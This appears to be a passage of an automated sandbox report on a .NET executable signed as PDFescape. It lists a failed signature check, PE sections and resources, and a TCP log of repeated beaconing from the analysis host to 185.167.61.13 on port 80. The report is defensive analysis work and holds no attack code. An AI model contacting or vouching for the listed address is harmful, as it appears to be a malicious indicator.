Signature Issuer:	CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	07/06/2019 20:00:00 11/06/2021 08:00:00
Subject Chain	CN=PDFescape, O=PDFescape, L=Encinitas, S=California, C=US
Version:	3
Thumbprint MD5:	36083DDD2C0C94D360522774BEDA31E2
Thumbprint SHA-1:	B140BCEDA70D6A6C48C4258CC83F4ECCC96845C8
Thumbprint SHA-256:	B12E1F90FEB1A204409F736836E7BA7F078E40B3A809A73BAC08AEB658627610
Serial:	06E2870844B5FE917E3498FD2526FBCD

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd6a0	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x2f0d2	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x3ae00	0x3378
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x3e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb6f0	0xb800	3a1c970d081c56b2ad69b70a04ff578e	False	0.5487644361413043	data	5.939148641753943	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x2f0d2	0x2f200	f50624b0c795e794cc04f7694fd461a3	False	0.3628564323607427	data	6.232542919188173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x3e000	0xc	0x200	279588c3633acfea830b53a9ece43405	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xe0ac	0x709e	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9976066597294485
RT_ICON	0x1516e	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.17033893292322252
RT_ICON	0x259ba	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	0.271415808282531
RT_ICON	0x2ee86	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	0.3012014787430684
RT_ICON	0x34332	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.28259329239489844
RT_ICON	0x3857e	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.38558091286307056
RT_ICON	0x3ab4a	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.4598968105065666
RT_ICON	0x3bc16	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	0.5704918032786885
RT_ICON	0x3c5c2	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.6631205673758865
RT_GROUP_ICON	0x3ca66	0x84	data	0.7272727272727273
RT_VERSION	0x3cb26	0x3bc	data	0.41422594142259417
RT_MANIFEST	0x3cf1e	0x1b4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators	0.5642201834862385

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 5, 2024 14:37:17.297852039 CEST	49709	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:17.302902937 CEST	80	49709	185.167.61.13	192.168.2.10
Oct 5, 2024 14:37:17.303066015 CEST	49709	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:17.304004908 CEST	49709	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:17.309113026 CEST	80	49709	185.167.61.13	192.168.2.10
Oct 5, 2024 14:37:38.669420004 CEST	80	49709	185.167.61.13	192.168.2.10
Oct 5, 2024 14:37:38.669645071 CEST	49709	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:38.678283930 CEST	49709	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:38.678945065 CEST	49711	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:38.683295965 CEST	80	49709	185.167.61.13	192.168.2.10
Oct 5, 2024 14:37:38.684035063 CEST	80	49711	185.167.61.13	192.168.2.10
Oct 5, 2024 14:37:38.684227943 CEST	49711	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:38.684227943 CEST	49711	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:37:38.690646887 CEST	80	49711	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:00.063956022 CEST	80	49711	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:00.064147949 CEST	49711	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:00.065216064 CEST	49711	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:00.070405006 CEST	80	49711	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:00.074903965 CEST	49712	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:00.080720901 CEST	80	49712	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:00.080836058 CEST	49712	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:00.081015110 CEST	49712	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:00.087641954 CEST	80	49712	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:21.457211971 CEST	80	49712	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:21.457331896 CEST	49712	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:21.457895041 CEST	49712	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:21.458511114 CEST	49714	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:21.463710070 CEST	80	49712	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:21.464699030 CEST	80	49714	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:21.464771986 CEST	49714	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:21.464966059 CEST	49714	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:21.469965935 CEST	80	49714	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:41.837115049 CEST	49714	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:41.838728905 CEST	49715	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:41.843528986 CEST	80	49715	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:41.843606949 CEST	49715	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:41.843748093 CEST	49715	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:41.848567963 CEST	80	49715	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:41.882137060 CEST	80	49714	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:42.383708954 CEST	49715	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:42.384614944 CEST	49716	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:42.389884949 CEST	80	49716	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:42.390002966 CEST	49716	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:42.390094042 CEST	49716	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:42.395353079 CEST	80	49716	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:42.430123091 CEST	80	49715	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:42.826488018 CEST	80	49714	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:42.826606035 CEST	49714	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.446151018 CEST	49716	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.446845055 CEST	49717	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.451733112 CEST	80	49717	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:53.451870918 CEST	49717	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.451989889 CEST	49717	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.456799984 CEST	80	49717	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:53.494168997 CEST	80	49716	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:53.696815968 CEST	49717	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.696815968 CEST	49718	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.701797009 CEST	80	49718	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:53.701896906 CEST	49718	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.702023029 CEST	49718	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:38:53.707065105 CEST	80	49718	185.167.61.13	192.168.2.10
Oct 5, 2024 14:38:53.742161989 CEST	80	49717	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.233498096 CEST	80	49715	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.233789921 CEST	49715	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:03.493283987 CEST	49718	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:03.498692989 CEST	49719	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:03.503526926 CEST	80	49719	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.503645897 CEST	49719	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:03.504206896 CEST	49719	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:03.509047031 CEST	80	49719	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.542073011 CEST	80	49718	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.799901009 CEST	80	49716	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:03.799963951 CEST	49716	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:08.461833954 CEST	49719	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:08.463176012 CEST	49720	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:08.468106031 CEST	80	49720	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:08.468182087 CEST	49720	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:08.468357086 CEST	49720	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:08.474239111 CEST	80	49720	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:08.514194012 CEST	80	49719	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:11.165298939 CEST	49720	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:11.166560888 CEST	49721	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:11.171545029 CEST	80	49721	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:11.174844027 CEST	49721	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:11.175188065 CEST	49721	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:11.180095911 CEST	80	49721	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:11.218251944 CEST	80	49720	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:14.816123009 CEST	80	49717	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:14.816190004 CEST	49717	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:15.079288006 CEST	80	49718	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:15.079368114 CEST	49718	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:21.900213003 CEST	49721	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:21.900213003 CEST	49722	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:21.905333996 CEST	80	49722	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:21.905775070 CEST	49722	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:21.905917883 CEST	49722	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:21.910779953 CEST	80	49722	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:21.946182966 CEST	80	49721	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:22.040668011 CEST	49722	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:22.040674925 CEST	49723	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:22.046489000 CEST	80	49723	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:22.046861887 CEST	49723	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:22.047116041 CEST	49723	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:22.053077936 CEST	80	49723	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:22.092133999 CEST	80	49722	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:24.859659910 CEST	80	49719	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:24.859733105 CEST	49719	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:26.759011030 CEST	49723	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:26.761184931 CEST	49724	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:26.766104937 CEST	80	49724	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:26.766235113 CEST	49724	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:26.766469002 CEST	49724	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:26.771205902 CEST	80	49724	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:26.806129932 CEST	80	49723	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:29.828605890 CEST	80	49720	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:29.828689098 CEST	49720	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:32.546653986 CEST	80	49721	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:32.547777891 CEST	49721	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.243207932 CEST	49724	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.244728088 CEST	49725	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.249552011 CEST	80	49725	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:33.249773026 CEST	49725	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.249833107 CEST	49725	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.254607916 CEST	80	49725	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:33.290035009 CEST	49725	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.290141106 CEST	80	49724	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:33.290718079 CEST	49726	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.295475006 CEST	80	49726	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:33.295561075 CEST	49726	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.295675993 CEST	49726	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:33.300379992 CEST	80	49726	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:33.338073015 CEST	80	49725	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.008892059 CEST	49726	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.010077953 CEST	49727	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.014970064 CEST	80	49727	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.015043974 CEST	49727	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.015189886 CEST	49727	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.020006895 CEST	80	49727	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.058176994 CEST	80	49726	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.399441957 CEST	49727	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.400185108 CEST	49728	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.418884993 CEST	80	49728	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.418977976 CEST	49728	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.419152975 CEST	49728	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:35.425165892 CEST	80	49728	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:35.458214998 CEST	80	49727	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.008904934 CEST	49728	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.010181904 CEST	49729	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.015084028 CEST	80	49729	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.015758038 CEST	49729	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.015841961 CEST	49729	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.020651102 CEST	80	49729	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.054125071 CEST	80	49728	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.946302891 CEST	49729	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.947077990 CEST	49730	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.951953888 CEST	80	49730	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.952013969 CEST	49730	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.952151060 CEST	49730	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:36.957000971 CEST	80	49730	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:36.994245052 CEST	80	49729	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:37.040431976 CEST	49730	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:37.041830063 CEST	49731	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:37.046730995 CEST	80	49731	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:37.046797991 CEST	49731	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:37.046973944 CEST	49731	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:37.051891088 CEST	80	49731	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:37.086194992 CEST	80	49730	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:38.836956978 CEST	49731	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:38.838020086 CEST	49732	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:38.842822075 CEST	80	49732	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:38.842885971 CEST	49732	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:38.843039989 CEST	49732	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:38.847934961 CEST	80	49732	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:38.882231951 CEST	80	49731	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:39.055731058 CEST	49732	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:39.057466984 CEST	49733	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:39.062407017 CEST	80	49733	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:39.062469006 CEST	49733	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:39.062575102 CEST	49733	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:39.067308903 CEST	80	49733	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:39.102122068 CEST	80	49732	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:43.314244032 CEST	80	49722	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:43.314311028 CEST	49722	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.427329063 CEST	80	49723	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:43.427457094 CEST	49723	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.915100098 CEST	49733	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.915973902 CEST	49734	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.920722961 CEST	80	49734	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:43.920883894 CEST	49734	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.921128035 CEST	49734	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:43.925879955 CEST	80	49734	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:43.966216087 CEST	80	49733	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:46.821400881 CEST	49734	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:46.822319984 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:46.827873945 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:46.827938080 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:46.828227997 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:46.835535049 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:46.871234894 CEST	80	49734	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:48.140768051 CEST	80	49724	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:48.140908957 CEST	49724	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:52.680901051 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:52.682863951 CEST	49736	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:52.687736988 CEST	80	49736	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:52.690963030 CEST	49736	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:52.694835901 CEST	49736	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:52.699665070 CEST	80	49736	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:52.726161957 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:53.305772066 CEST	49736	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:53.306638002 CEST	49737	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:53.311588049 CEST	80	49737	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:53.311687946 CEST	49737	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:53.311892033 CEST	49737	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:53.316751957 CEST	80	49737	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:53.354922056 CEST	80	49736	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:54.641117096 CEST	80	49725	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:54.641881943 CEST	49725	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:54.642611027 CEST	80	49726	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:54.642683029 CEST	49726	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:56.511476994 CEST	80	49727	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:56.511580944 CEST	49727	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:56.801109076 CEST	80	49728	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:56.801229954 CEST	49728	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:57.395764112 CEST	80	49729	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:57.396831036 CEST	49729	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:58.328788996 CEST	80	49730	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:58.328936100 CEST	49730	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:39:58.406816006 CEST	80	49731	185.167.61.13	192.168.2.10
Oct 5, 2024 14:39:58.406900883 CEST	49731	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.269721031 CEST	80	49732	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:00.270951033 CEST	49732	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.422251940 CEST	80	49733	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:00.422327995 CEST	49733	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.587114096 CEST	49737	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.589857101 CEST	49738	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.594702005 CEST	80	49738	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:00.594793081 CEST	49738	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.594929934 CEST	49738	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:00.599710941 CEST	80	49738	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:00.634085894 CEST	80	49737	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:05.301620007 CEST	80	49734	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:05.301819086 CEST	49734	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:08.807569027 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:08.807593107 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:08.807684898 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:08.807684898 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:08.807763100 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:08.812516928 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:08.812532902 CEST	49735	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:08.817303896 CEST	80	49735	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:13.805825949 CEST	49738	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:13.807054996 CEST	49739	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:13.811992884 CEST	80	49739	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:13.812057972 CEST	49739	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:13.812184095 CEST	49739	80	192.168.2.10	185.167.61.13
Oct 5, 2024 14:40:13.817377090 CEST	80	49739	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:13.858182907 CEST	80	49738	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:14.063249111 CEST	80	49736	185.167.61.13	192.168.2.10
Oct 5, 2024 14:40:14.065129042 CEST	49736	80	192.168.2.10	185.167.61.13
